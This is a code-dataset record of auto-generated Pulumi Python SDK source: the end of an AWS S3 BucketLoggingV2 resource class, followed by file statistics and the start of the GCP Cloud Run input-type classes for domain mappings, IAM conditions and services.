        """
        Get an existing BucketLoggingV2 resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] bucket: The name of the bucket.
        :param pulumi.Input[str] expected_bucket_owner: The account ID of the expected bucket owner.
        :param pulumi.Input[str] target_bucket: The bucket where you want Amazon S3 to store server access logs.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketLoggingV2TargetGrantArgs']]]] target_grants: Set of configuration blocks with information for granting permissions documented below.
        :param pulumi.Input[str] target_prefix: A prefix for all log object keys.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _BucketLoggingV2State.__new__(_BucketLoggingV2State)

        __props__.__dict__["bucket"] = bucket
        __props__.__dict__["expected_bucket_owner"] = expected_bucket_owner
        __props__.__dict__["target_bucket"] = target_bucket
        __props__.__dict__["target_grants"] = target_grants
        __props__.__dict__["target_prefix"] = target_prefix
        return BucketLoggingV2(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def bucket(self) -> pulumi.Output[str]:
        """
        The name of the bucket.
        """
        return pulumi.get(self, "bucket")

    @property
    @pulumi.getter(name="expectedBucketOwner")
    def expected_bucket_owner(self) -> pulumi.Output[Optional[str]]:
        """
        The account ID of the expected bucket owner.
        """
        return pulumi.get(self, "expected_bucket_owner")

    @property
    @pulumi.getter(name="targetBucket")
    def target_bucket(self) -> pulumi.Output[str]:
        """
        The bucket where you want Amazon S3 to store server access logs.
        """
        return pulumi.get(self, "target_bucket")

    @property
    @pulumi.getter(name="targetGrants")
    def target_grants(self) -> pulumi.Output[Optional[Sequence['outputs.BucketLoggingV2TargetGrant']]]:
        """
        Set of configuration blocks with information for granting permissions documented below.
        """
        return pulumi.get(self, "target_grants")

    @property
    @pulumi.getter(name="targetPrefix")
    def target_prefix(self) -> pulumi.Output[str]:
        """
        A prefix for all log object keys.
        """
        return pulumi.get(self, "target_prefix")
| 42.892421
| 206
| 0.657698
| 1,978
| 17,543
| 5.597068
| 0.093023
| 0.081474
| 0.068287
| 0.053654
| 0.840033
| 0.817632
| 0.807244
| 0.774094
| 0.766778
| 0.752145
| 0
| 0.009116
| 0.243345
| 17,543
| 408
| 207
| 42.997549
| 0.824921
| 0.331357
| 0
| 0.642512
| 1
| 0
| 0.134018
| 0.050009
| 0
| 0
| 0
| 0
| 0
| 1
| 0.154589
| false
| 0.004831
| 0.033816
| 0
| 0.280193
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
314bef5e2f0e84ab8d6fc3ce1f8c6357517861c8
| 89,932
|
py
|
Python
|
sdk/python/pulumi_gcp/cloudrun/_inputs.py
|
pjbizon/pulumi-gcp
|
0d09cbc1dcf50093a177531f7596c27db11a2e58
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/cloudrun/_inputs.py
|
pjbizon/pulumi-gcp
|
0d09cbc1dcf50093a177531f7596c27db11a2e58
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/cloudrun/_inputs.py
|
pjbizon/pulumi-gcp
|
0d09cbc1dcf50093a177531f7596c27db11a2e58
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'DomainMappingMetadataArgs',
'DomainMappingSpecArgs',
'DomainMappingStatusArgs',
'DomainMappingStatusConditionArgs',
'DomainMappingStatusResourceRecordArgs',
'IamBindingConditionArgs',
'IamMemberConditionArgs',
'ServiceMetadataArgs',
'ServiceStatusArgs',
'ServiceStatusConditionArgs',
'ServiceTemplateArgs',
'ServiceTemplateMetadataArgs',
'ServiceTemplateSpecArgs',
'ServiceTemplateSpecContainerArgs',
'ServiceTemplateSpecContainerEnvArgs',
'ServiceTemplateSpecContainerEnvFromArgs',
'ServiceTemplateSpecContainerEnvFromConfigMapRefArgs',
'ServiceTemplateSpecContainerEnvFromConfigMapRefLocalObjectReferenceArgs',
'ServiceTemplateSpecContainerEnvFromSecretRefArgs',
'ServiceTemplateSpecContainerEnvFromSecretRefLocalObjectReferenceArgs',
'ServiceTemplateSpecContainerEnvValueFromArgs',
'ServiceTemplateSpecContainerEnvValueFromSecretKeyRefArgs',
'ServiceTemplateSpecContainerPortArgs',
'ServiceTemplateSpecContainerResourcesArgs',
'ServiceTemplateSpecContainerVolumeMountArgs',
'ServiceTemplateSpecVolumeArgs',
'ServiceTemplateSpecVolumeSecretArgs',
'ServiceTemplateSpecVolumeSecretItemArgs',
'ServiceTrafficArgs',
]
@pulumi.input_type
class DomainMappingMetadataArgs:
    """Kubernetes-style object metadata for a Cloud Run ``DomainMapping``.

    Only ``namespace`` is required; the remaining fields are optional and are
    typically populated by the server (they carry a leading ``-`` in the
    generated provider docs).
    """

    def __init__(__self__, *,
                 namespace: pulumi.Input[str],
                 annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 generation: Optional[pulumi.Input[int]] = None,
                 labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 resource_version: Optional[pulumi.Input[str]] = None,
                 self_link: Optional[pulumi.Input[str]] = None,
                 uid: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] namespace: In Cloud Run the namespace must be equal to either the
               project ID or project number.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Annotations is a key value map stored with a resource that
               may be set by external tools to store and retrieve arbitrary metadata. More
               info: http://kubernetes.io/docs/user-guide/annotations
               **Note**: The Cloud Run API may add additional annotations that were not provided in your config.
               If the provider plan shows a diff where a server-side annotation is added, you can add it to your config
               or apply the lifecycle.ignore_changes rule to the metadata.0.annotations field.
        :param pulumi.Input[int] generation: -
               A sequence number representing a specific generation of the desired state.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Map of string keys and values that can be used to organize and categorize
               (scope and select) objects. May match selectors of replication controllers
               and routes.
               More info: http://kubernetes.io/docs/user-guide/labels
        :param pulumi.Input[str] resource_version: -
               An opaque value that represents the internal version of this object that
               can be used by clients to determine when objects have changed. May be used
               for optimistic concurrency, change detection, and the watch operation on a
               resource or set of resources. They may only be valid for a
               particular resource or set of resources.
               More info:
               https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
        :param pulumi.Input[str] self_link: -
               SelfLink is a URL representing this object.
        :param pulumi.Input[str] uid: -
               UID is a unique id generated by the server on successful creation of a resource and is not
               allowed to change on PUT operations.
               More info: http://kubernetes.io/docs/user-guide/identifiers#uids
        """
        pulumi.set(__self__, "namespace", namespace)
        # Optional fields are stored only when explicitly provided, so that
        # unset fields stay absent from the pulumi property bag.
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if generation is not None:
            pulumi.set(__self__, "generation", generation)
        if labels is not None:
            pulumi.set(__self__, "labels", labels)
        if resource_version is not None:
            pulumi.set(__self__, "resource_version", resource_version)
        if self_link is not None:
            pulumi.set(__self__, "self_link", self_link)
        if uid is not None:
            pulumi.set(__self__, "uid", uid)

    @property
    @pulumi.getter
    def namespace(self) -> pulumi.Input[str]:
        """
        In Cloud Run the namespace must be equal to either the
        project ID or project number.
        """
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, value: pulumi.Input[str]):
        pulumi.set(self, "namespace", value)

    @property
    @pulumi.getter
    def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Annotations is a key value map stored with a resource that
        may be set by external tools to store and retrieve arbitrary metadata. More
        info: http://kubernetes.io/docs/user-guide/annotations
        **Note**: The Cloud Run API may add additional annotations that were not provided in your config.
        If the provider plan shows a diff where a server-side annotation is added, you can add it to your config
        or apply the lifecycle.ignore_changes rule to the metadata.0.annotations field.
        """
        return pulumi.get(self, "annotations")

    @annotations.setter
    def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "annotations", value)

    @property
    @pulumi.getter
    def generation(self) -> Optional[pulumi.Input[int]]:
        """
        -
        A sequence number representing a specific generation of the desired state.
        """
        return pulumi.get(self, "generation")

    @generation.setter
    def generation(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "generation", value)

    @property
    @pulumi.getter
    def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Map of string keys and values that can be used to organize and categorize
        (scope and select) objects. May match selectors of replication controllers
        and routes.
        More info: http://kubernetes.io/docs/user-guide/labels
        """
        return pulumi.get(self, "labels")

    @labels.setter
    def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "labels", value)

    @property
    @pulumi.getter(name="resourceVersion")
    def resource_version(self) -> Optional[pulumi.Input[str]]:
        """
        -
        An opaque value that represents the internal version of this object that
        can be used by clients to determine when objects have changed. May be used
        for optimistic concurrency, change detection, and the watch operation on a
        resource or set of resources. They may only be valid for a
        particular resource or set of resources.
        More info:
        https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
        """
        return pulumi.get(self, "resource_version")

    @resource_version.setter
    def resource_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_version", value)

    @property
    @pulumi.getter(name="selfLink")
    def self_link(self) -> Optional[pulumi.Input[str]]:
        """
        -
        SelfLink is a URL representing this object.
        """
        return pulumi.get(self, "self_link")

    @self_link.setter
    def self_link(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "self_link", value)

    @property
    @pulumi.getter
    def uid(self) -> Optional[pulumi.Input[str]]:
        """
        -
        UID is a unique id generated by the server on successful creation of a resource and is not
        allowed to change on PUT operations.
        More info: http://kubernetes.io/docs/user-guide/identifiers#uids
        """
        return pulumi.get(self, "uid")

    @uid.setter
    def uid(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "uid", value)
@pulumi.input_type
class DomainMappingSpecArgs:
    """Desired state (``spec``) of a Cloud Run ``DomainMapping``."""

    def __init__(__self__, *,
                 route_name: pulumi.Input[str],
                 certificate_mode: Optional[pulumi.Input[str]] = None,
                 force_override: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[str] route_name: The name of the Cloud Run Service that this DomainMapping
               applies to. The route must exist.
        :param pulumi.Input[str] certificate_mode: The mode of the certificate.
               Default value is `AUTOMATIC`. Possible values are `NONE` and `AUTOMATIC`.
        :param pulumi.Input[bool] force_override: If set, the mapping will override any mapping set before
               this spec was set. It is recommended that the user leaves this empty to
               receive an error warning about a potential conflict and only set it once
               the respective UI has given such a warning.
        """
        pulumi.set(__self__, "route_name", route_name)
        # The two optional knobs are persisted only when the caller supplied them.
        for attr_name, attr_value in (("certificate_mode", certificate_mode),
                                      ("force_override", force_override)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="routeName")
    def route_name(self) -> pulumi.Input[str]:
        """
        The name of the Cloud Run Service that this DomainMapping applies to.
        The route must exist.
        """
        return pulumi.get(self, "route_name")

    @route_name.setter
    def route_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "route_name", value)

    @property
    @pulumi.getter(name="certificateMode")
    def certificate_mode(self) -> Optional[pulumi.Input[str]]:
        """
        The mode of the certificate.
        Default value is `AUTOMATIC`.
        Possible values are `NONE` and `AUTOMATIC`.
        """
        return pulumi.get(self, "certificate_mode")

    @certificate_mode.setter
    def certificate_mode(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "certificate_mode", value)

    @property
    @pulumi.getter(name="forceOverride")
    def force_override(self) -> Optional[pulumi.Input[bool]]:
        """
        If set, the mapping will override any mapping set before this spec was set.
        It is recommended that the user leaves this empty to receive an error
        warning about a potential conflict and only set it once the respective UI
        has given such a warning.
        """
        return pulumi.get(self, "force_override")

    @force_override.setter
    def force_override(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "force_override", value)
@pulumi.input_type
class DomainMappingStatusArgs:
    """Observed status of a ``DomainMapping``; every field is optional."""

    def __init__(__self__, *,
                 conditions: Optional[pulumi.Input[Sequence[pulumi.Input['DomainMappingStatusConditionArgs']]]] = None,
                 mapped_route_name: Optional[pulumi.Input[str]] = None,
                 observed_generation: Optional[pulumi.Input[int]] = None,
                 resource_records: Optional[pulumi.Input[Sequence[pulumi.Input['DomainMappingStatusResourceRecordArgs']]]] = None):
        # Record only the fields the caller actually provided.
        supplied = (
            ("conditions", conditions),
            ("mapped_route_name", mapped_route_name),
            ("observed_generation", observed_generation),
            ("resource_records", resource_records),
        )
        for field_name, field_value in supplied:
            if field_value is not None:
                pulumi.set(__self__, field_name, field_value)

    @property
    @pulumi.getter
    def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DomainMappingStatusConditionArgs']]]]:
        return pulumi.get(self, "conditions")

    @conditions.setter
    def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DomainMappingStatusConditionArgs']]]]):
        pulumi.set(self, "conditions", value)

    @property
    @pulumi.getter(name="mappedRouteName")
    def mapped_route_name(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "mapped_route_name")

    @mapped_route_name.setter
    def mapped_route_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "mapped_route_name", value)

    @property
    @pulumi.getter(name="observedGeneration")
    def observed_generation(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "observed_generation")

    @observed_generation.setter
    def observed_generation(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "observed_generation", value)

    @property
    @pulumi.getter(name="resourceRecords")
    def resource_records(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DomainMappingStatusResourceRecordArgs']]]]:
        return pulumi.get(self, "resource_records")

    @resource_records.setter
    def resource_records(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DomainMappingStatusResourceRecordArgs']]]]):
        pulumi.set(self, "resource_records", value)
@pulumi.input_type
class DomainMappingStatusConditionArgs:
    """One status condition of a ``DomainMapping``; all fields optional."""

    def __init__(__self__, *,
                 message: Optional[pulumi.Input[str]] = None,
                 reason: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        # Persist only fields that were explicitly supplied.
        for cond_key, cond_value in (("message", message),
                                     ("reason", reason),
                                     ("status", status),
                                     ("type", type)):
            if cond_value is not None:
                pulumi.set(__self__, cond_key, cond_value)

    @property
    @pulumi.getter
    def message(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "message")

    @message.setter
    def message(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "message", value)

    @property
    @pulumi.getter
    def reason(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "reason")

    @reason.setter
    def reason(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "reason", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class DomainMappingStatusResourceRecordArgs:
    """A DNS resource record reported in a DomainMapping status."""

    def __init__(__self__, *,
                 name: Optional[pulumi.Input[str]] = None,
                 rrdata: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] name: Name should be a [verified](https://support.google.com/webmasters/answer/9008080) domain
        """
        # Only provided fields end up in the property bag.
        for record_key, record_value in (("name", name),
                                         ("rrdata", rrdata),
                                         ("type", type)):
            if record_value is not None:
                pulumi.set(__self__, record_key, record_value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name should be a [verified](https://support.google.com/webmasters/answer/9008080) domain
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def rrdata(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "rrdata")

    @rrdata.setter
    def rrdata(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "rrdata", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class IamBindingConditionArgs:
    """Condition block of a Cloud Run IAM binding: required ``expression``
    and ``title``, optional ``description``."""

    def __init__(__self__, *,
                 expression: pulumi.Input[str],
                 title: pulumi.Input[str],
                 description: Optional[pulumi.Input[str]] = None):
        # Required fields are always stored; description only when given.
        for required_key, required_value in (("expression", expression),
                                             ("title", title)):
            pulumi.set(__self__, required_key, required_value)
        if description is not None:
            pulumi.set(__self__, "description", description)

    @property
    @pulumi.getter
    def expression(self) -> pulumi.Input[str]:
        return pulumi.get(self, "expression")

    @expression.setter
    def expression(self, value: pulumi.Input[str]):
        pulumi.set(self, "expression", value)

    @property
    @pulumi.getter
    def title(self) -> pulumi.Input[str]:
        return pulumi.get(self, "title")

    @title.setter
    def title(self, value: pulumi.Input[str]):
        pulumi.set(self, "title", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
@pulumi.input_type
class IamMemberConditionArgs:
    """Condition block of a Cloud Run IAM member: required ``expression``
    and ``title``, optional ``description``."""

    def __init__(__self__, *,
                 expression: pulumi.Input[str],
                 title: pulumi.Input[str],
                 description: Optional[pulumi.Input[str]] = None):
        # Store the mandatory pair first, then the optional description.
        pulumi.set(__self__, "title", title)
        pulumi.set(__self__, "expression", expression)
        if description is not None:
            pulumi.set(__self__, "description", description)

    @property
    @pulumi.getter
    def expression(self) -> pulumi.Input[str]:
        return pulumi.get(self, "expression")

    @expression.setter
    def expression(self, value: pulumi.Input[str]):
        pulumi.set(self, "expression", value)

    @property
    @pulumi.getter
    def title(self) -> pulumi.Input[str]:
        return pulumi.get(self, "title")

    @title.setter
    def title(self, value: pulumi.Input[str]):
        pulumi.set(self, "title", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
@pulumi.input_type
class ServiceMetadataArgs:
    """Kubernetes-style object metadata for a Cloud Run ``Service``.

    All fields are optional here (unlike ``DomainMappingMetadataArgs``, where
    ``namespace`` is required); server-populated fields carry a leading ``-``
    in the generated provider docs.
    """

    def __init__(__self__, *,
                 annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 generation: Optional[pulumi.Input[int]] = None,
                 labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 namespace: Optional[pulumi.Input[str]] = None,
                 resource_version: Optional[pulumi.Input[str]] = None,
                 self_link: Optional[pulumi.Input[str]] = None,
                 uid: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Annotations is a key value map stored with a resource that
               may be set by external tools to store and retrieve arbitrary metadata. More
               info: http://kubernetes.io/docs/user-guide/annotations
               **Note**: The Cloud Run API may add additional annotations that were not provided in your config.
               If the provider plan shows a diff where a server-side annotation is added, you can add it to your config
               or apply the lifecycle.ignore_changes rule to the metadata.0.annotations field.
               Cloud Run (fully managed) uses the following annotation keys to configure features on a Service:
               - `run.googleapis.com/ingress` sets the [ingress settings](https://cloud.google.com/sdk/gcloud/reference/run/deploy#--ingress)
               for the Service. For example, `"run.googleapis.com/ingress" = "all"`.
        :param pulumi.Input[int] generation: -
               A sequence number representing a specific generation of the desired state.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Map of string keys and values that can be used to organize and categorize
               (scope and select) objects. May match selectors of replication controllers
               and routes.
               More info: http://kubernetes.io/docs/user-guide/labels
        :param pulumi.Input[str] namespace: In Cloud Run the namespace must be equal to either the
               project ID or project number.
        :param pulumi.Input[str] resource_version: -
               An opaque value that represents the internal version of this object that
               can be used by clients to determine when objects have changed. May be used
               for optimistic concurrency, change detection, and the watch operation on a
               resource or set of resources. They may only be valid for a
               particular resource or set of resources.
               More info:
               https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
        :param pulumi.Input[str] self_link: -
               SelfLink is a URL representing this object.
        :param pulumi.Input[str] uid: -
               UID is a unique id generated by the server on successful creation of a resource and is not
               allowed to change on PUT operations.
               More info: http://kubernetes.io/docs/user-guide/identifiers#uids
        """
        # Fields are stored only when explicitly provided, so that unset
        # fields stay absent from the pulumi property bag.
        if annotations is not None:
            pulumi.set(__self__, "annotations", annotations)
        if generation is not None:
            pulumi.set(__self__, "generation", generation)
        if labels is not None:
            pulumi.set(__self__, "labels", labels)
        if namespace is not None:
            pulumi.set(__self__, "namespace", namespace)
        if resource_version is not None:
            pulumi.set(__self__, "resource_version", resource_version)
        if self_link is not None:
            pulumi.set(__self__, "self_link", self_link)
        if uid is not None:
            pulumi.set(__self__, "uid", uid)

    @property
    @pulumi.getter
    def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Annotations is a key value map stored with a resource that
        may be set by external tools to store and retrieve arbitrary metadata. More
        info: http://kubernetes.io/docs/user-guide/annotations
        **Note**: The Cloud Run API may add additional annotations that were not provided in your config.
        If the provider plan shows a diff where a server-side annotation is added, you can add it to your config
        or apply the lifecycle.ignore_changes rule to the metadata.0.annotations field.
        Cloud Run (fully managed) uses the following annotation keys to configure features on a Service:
        - `run.googleapis.com/ingress` sets the [ingress settings](https://cloud.google.com/sdk/gcloud/reference/run/deploy#--ingress)
        for the Service. For example, `"run.googleapis.com/ingress" = "all"`.
        """
        return pulumi.get(self, "annotations")

    @annotations.setter
    def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "annotations", value)

    @property
    @pulumi.getter
    def generation(self) -> Optional[pulumi.Input[int]]:
        """
        -
        A sequence number representing a specific generation of the desired state.
        """
        return pulumi.get(self, "generation")

    @generation.setter
    def generation(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "generation", value)

    @property
    @pulumi.getter
    def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Map of string keys and values that can be used to organize and categorize
        (scope and select) objects. May match selectors of replication controllers
        and routes.
        More info: http://kubernetes.io/docs/user-guide/labels
        """
        return pulumi.get(self, "labels")

    @labels.setter
    def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "labels", value)

    @property
    @pulumi.getter
    def namespace(self) -> Optional[pulumi.Input[str]]:
        """
        In Cloud Run the namespace must be equal to either the
        project ID or project number.
        """
        return pulumi.get(self, "namespace")

    @namespace.setter
    def namespace(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "namespace", value)

    @property
    @pulumi.getter(name="resourceVersion")
    def resource_version(self) -> Optional[pulumi.Input[str]]:
        """
        -
        An opaque value that represents the internal version of this object that
        can be used by clients to determine when objects have changed. May be used
        for optimistic concurrency, change detection, and the watch operation on a
        resource or set of resources. They may only be valid for a
        particular resource or set of resources.
        More info:
        https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
        """
        return pulumi.get(self, "resource_version")

    @resource_version.setter
    def resource_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_version", value)

    @property
    @pulumi.getter(name="selfLink")
    def self_link(self) -> Optional[pulumi.Input[str]]:
        """
        -
        SelfLink is a URL representing this object.
        """
        return pulumi.get(self, "self_link")

    @self_link.setter
    def self_link(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "self_link", value)

    @property
    @pulumi.getter
    def uid(self) -> Optional[pulumi.Input[str]]:
        """
        -
        UID is a unique id generated by the server on successful creation of a resource and is not
        allowed to change on PUT operations.
        More info: http://kubernetes.io/docs/user-guide/identifiers#uids
        """
        return pulumi.get(self, "uid")

    @uid.setter
    def uid(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "uid", value)
@pulumi.input_type
class ServiceStatusArgs:
    """Observed status of a Cloud Run ``Service``; every field is optional."""

    def __init__(__self__, *,
                 conditions: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceStatusConditionArgs']]]] = None,
                 latest_created_revision_name: Optional[pulumi.Input[str]] = None,
                 latest_ready_revision_name: Optional[pulumi.Input[str]] = None,
                 observed_generation: Optional[pulumi.Input[int]] = None,
                 url: Optional[pulumi.Input[str]] = None):
        # Record only the fields the caller actually provided.
        supplied = (
            ("conditions", conditions),
            ("latest_created_revision_name", latest_created_revision_name),
            ("latest_ready_revision_name", latest_ready_revision_name),
            ("observed_generation", observed_generation),
            ("url", url),
        )
        for field_name, field_value in supplied:
            if field_value is not None:
                pulumi.set(__self__, field_name, field_value)

    @property
    @pulumi.getter
    def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceStatusConditionArgs']]]]:
        return pulumi.get(self, "conditions")

    @conditions.setter
    def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceStatusConditionArgs']]]]):
        pulumi.set(self, "conditions", value)

    @property
    @pulumi.getter(name="latestCreatedRevisionName")
    def latest_created_revision_name(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "latest_created_revision_name")

    @latest_created_revision_name.setter
    def latest_created_revision_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "latest_created_revision_name", value)

    @property
    @pulumi.getter(name="latestReadyRevisionName")
    def latest_ready_revision_name(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "latest_ready_revision_name")

    @latest_ready_revision_name.setter
    def latest_ready_revision_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "latest_ready_revision_name", value)

    @property
    @pulumi.getter(name="observedGeneration")
    def observed_generation(self) -> Optional[pulumi.Input[int]]:
        return pulumi.get(self, "observed_generation")

    @observed_generation.setter
    def observed_generation(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "observed_generation", value)

    @property
    @pulumi.getter
    def url(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "url")

    @url.setter
    def url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "url", value)
@pulumi.input_type
class ServiceStatusConditionArgs:
    """One status condition of a Cloud Run ``Service``; all fields optional."""

    def __init__(__self__, *,
                 message: Optional[pulumi.Input[str]] = None,
                 reason: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        # Persist only fields that were explicitly supplied.
        for cond_key, cond_value in (("message", message),
                                     ("reason", reason),
                                     ("status", status),
                                     ("type", type)):
            if cond_value is not None:
                pulumi.set(__self__, cond_key, cond_value)

    @property
    @pulumi.getter
    def message(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "message")

    @message.setter
    def message(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "message", value)

    @property
    @pulumi.getter
    def reason(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "reason")

    @reason.setter
    def reason(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "reason", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)

    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class ServiceTemplateArgs:
    """Revision template of a Cloud Run ``Service``: optional metadata plus
    an optional revision spec."""

    def __init__(__self__, *,
                 metadata: Optional[pulumi.Input['ServiceTemplateMetadataArgs']] = None,
                 spec: Optional[pulumi.Input['ServiceTemplateSpecArgs']] = None):
        """
        :param pulumi.Input['ServiceTemplateMetadataArgs'] metadata: Metadata associated with this Service,
               including name, namespace, labels, and annotations.
               Structure is documented below.
        :param pulumi.Input['ServiceTemplateSpecArgs'] spec: RevisionSpec holds the desired state of the
               Revision (from the client). Structure is documented below.
        """
        # The two fields are independent; each is stored only when supplied.
        if spec is not None:
            pulumi.set(__self__, "spec", spec)
        if metadata is not None:
            pulumi.set(__self__, "metadata", metadata)

    @property
    @pulumi.getter
    def metadata(self) -> Optional[pulumi.Input['ServiceTemplateMetadataArgs']]:
        """
        Metadata associated with this Service, including name, namespace, labels,
        and annotations.
        Structure is documented below.
        """
        return pulumi.get(self, "metadata")

    @metadata.setter
    def metadata(self, value: Optional[pulumi.Input['ServiceTemplateMetadataArgs']]):
        pulumi.set(self, "metadata", value)

    @property
    @pulumi.getter
